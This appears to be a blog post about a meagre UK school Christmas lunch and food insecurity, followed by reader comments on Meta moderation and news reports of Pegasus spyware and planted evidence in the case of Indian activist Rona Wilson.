The supply chain news during the holidays is focused more on material goods and products but the impacts of supply chain problems on foods hasn’t changed a lot.

There are shortages of different foods in different regions and there’s a fair amount of look-aways because there’s certainly a feeling of no-ho-ho that goes with the reporting of hunger when you are planning a big holiday dinner bash.

One UK holiday meal got some unwanted attraction because of Social Media. If the images had not been shared, the paucity of what passed as a Special Menu would have been lost under the look-aways.

While the meal was given out in the UK with what must be holiday intended feast treats, the image appeared to be (in American English):

  • 2 dry English Muffins
  • 1 slice of dry turkey breast
  • 1 unidentifiable something called “pig in a blanket” (no relationship to the American breakfast item called “pig in a blanket”)
  • 1 single serving mince pie in a tiny muffin tin

It’s hard to know if the dinner was a function of budget or lack of supply.

The school board pushed back on criticisms, claiming the meal was “really enjoyed [by the students] and this was evidenced by the empty plates and happy faces” and refused to refund the cost of the lunch.

Until the images started making the rounds on Social Media.

Then school claimed the poor food options were “due to unforeseen supply chain issues and Covid-related staffing shortages.”

Perhaps if they had framed it as a Social Awareness Experience of hunger and lack of food security, they might have gotten a pass.

In California we are up to 161,000 homeless-houseless living in tents under freeways, encampments and semi-tolerated in empty lots. Another larger group in RV-homes are parked along the side streets and Walmart parking lots around Silicon Valley where their occupants work, because there are no affordable living spaces within hours of their job location. The demands for food support from all non-governmental organizations have increased 30-60%.

These conditions get a few more looks during feasting-days but the problem is still there the next day and the next day.

At least social media will be there to document it.

===

ht tps://ww w.the guard ian.com/education/2021/dec/15/school-apologises-after-grim-christmas-lunch-goes-viral-on-social-media

ResearcherZero December 17, 2021 10:52 PM

Can someone cycle CensorBot’s power again? It won’t allow any posts about “Terrorists” or any would be “terrorists” posing as academics, journalists or activists.

SpaceLifeForm December 18, 2021 12:25 AM

@ Ted, ResearcherZero, mmasnick

I hope Meta plans to issue accountability reports for these statements, good as they are.

Not happening. But they are running TV commercials with actors that say that moderation is hard. Under the Facebook label.

Zuck knows he is in trouble because of Cambridge Analytica.

Clive Robinson December 18, 2021 8:06 AM

@ SpaceLifeForm,

Zuck knows he is in trouble because of Cambridge Analytica.

He should not have so eagerly leapt in bed with a “bunny boiler”…

So now not only has he been “used” he’s starting to understand “abused”

But will it get through his narcissism, sadism and above all psychopathic behaviours?

Probably not, he will,

1, Blame others
2, Do it again
3, Keep doing what he is doing

Until he is forced to do otherwise, because he has no morals or ethics and sees himself as some deity…

ResearcherZero December 18, 2021 10:03 PM

@SpaceLifeForm

Moderation is hard. Just imagine people keep posting a story from the Washington Post about a guy who had 32 documents appear on his laptop.
You keep hitting it with hammers, then another story pops up that his phone was also hacked as well, by a well known spyware company.

The guy is in jail; he might not be guilty, he could be guilty, the documents appearing on his laptop might have an innocent explanation. NIA says there was no malware; an analysis by another security company says there is.

It’s like whack a mole.

ResearcherZero December 18, 2021 10:13 PM

The War in the Shadows (real article name [REDACTED])

A smartphone belonging to jailed Indian activist Rona Wilson was infiltrated using NSO Group’s Pegasus spyware before his arrest, according to a new forensic analysis by Amnesty International’s Security Lab that reignites questions about the use of malware attacks against dissidents and government critics in India.

The phone backups were provided to Amnesty at the request of Wilson’s defense team by Arsenal Consulting, a U.S. digital forensics firm that examined an electronic copy of Wilson’s laptop provided by his lawyers.

Amnesty’s analysis of two electronic copies of Wilson’s phone backups revealed that his phone was first compromised using Pegasus spyware in July 2017. The traces of infection appear again in early 2018, according to Amnesty.

Wilson received at least 15 SMS messages with malicious links in a span of six months, the last of which was delivered four months before his arrest in June 2018, according to Maynier. Some were disguised as links to sign petitions on human rights causes, and others were advertisements.

Wilson’s laptop had been subject to a sophisticated malware attack in 2016, nearly two years before his arrest, in which an unknown hacker planted evidence, including a letter purportedly written by Wilson to a Maoist leader where he urged the group to assassinate Modi. A subsequent forensic analysis by Arsenal revealed that at least 30 incriminating documents recovered from Wilson’s device by the police had been planted.

The charging documents claim that Wilson and more than a dozen other activists were associated with a banned guerrilla group of Maoists in central India that aims to overthrow the government. The activists deny the charges.

The activists have been charged under a stringent anti-terrorism law that critics say Modi’s government has used increasingly against dissidents.

hxxps: [REDACTED]

Digital forensics firm Arsenal Consulting said Wilson’s Apple phone was not just selected for surveillance by a client of Israel’s NSO Group but was also successfully compromised on many occasions.

hxxps: [REDACTED]

Key evidence against a group of Indian activists accused of plotting to overthrow the government was planted on a laptop seized by police, a new forensics report concludes, deepening doubts about a case viewed as a test of the rule of law under Prime Minister Narendra Modi.

hxxps: [REDACTED]

A previous analysis by Arsenal, which The Washington Post reported in February, found that 10 letters had been deposited on the laptop, including one that discussed an alleged plot to assassinate Modi. The latest report by Arsenal finds that 22 additional documents were also delivered to the computer by the same attacker.

The documents — now totaling 32 — have been cited by law enforcement as evidence against a group of activists accused of working with a banned Maoist militant group that has waged a decades-old insurgency against the Indian state.

hxxps: [REDACTED]

Wilson is one of 16 people arrested since June 2018 for their part in an alleged Maoist conspiracy to foment an uprising against Modi’s government. The origin of this so-called conspiracy was traced to a festival called the Elgaar Parishad (meaning “loud assembly”) held in Pune on 31 December 2017

Wilson had been nowhere near the Elgaar Parishad event. In fact, he was not even in Maharashtra at the time. According to his legal team, he was in Delhi. After the raid on his flat, the police, however, claimed that an analysis of Wilson’s computer and thumb drive had revealed several incriminating documents, including a letter in which Wilson had written about “targeting” Modi’s “road-shows” in “another Rajiv Gandhi type incident” – a reference to the assassination of India’s former prime minister by a Tamil Tiger suicide bomber in 1991.

hxxps: [REDACTED]

India’s federal anti-terror body, the National Investigation Agency (NIA), has dismissed Arsenal’s findings, saying the company has “no locus standi to give opinion”, and noting that the Indian government’s own forensics lab discovered no malware on Wilson’s devices.

hxxps: [REDACTED]

ResearcherZero December 18, 2021 11:30 PM

@SpaceLifeForm

More importantly, ‘patience is a virtue’, in this self-serving, instant gratification prison of our own design (or the design of the financiers of Zuckerberg, and all who since agreed to the EULA).

If you have ever worked with, or inspected the “chain of evidence”, in many jurisdictions it is more of a “chicken wire fence”, with a bunch of holes in it, that is poorly supervised. Repercussions for reporting the state of the “chain of evidence” can be severe. Repercussions for ‘reporting’ can be severe, and reporting is considered mandatory.

“the author who self-censors — a figure who in contemporary Internet terms might be called the “creator,” or “maker.” This figure is me — and this figure is you. It’s someone who takes the burden of censorship unto themselves, without any official censor or cover-censor commanding them.

…this figure threatens to become the ultimate vessel or incarnation of the State, a person who has internalized its oppressions and works them on themselves.”
https://edwardsnowden.substack.com/p/on-censorship-pt-1

Don’t ever become a victim of circumstance. Possibly maintain an ethereal vapor like form at all times, while never obtaining molecular stability? Any real presence in reality could end in certain doom, no matter how many high court judges you may personally know.
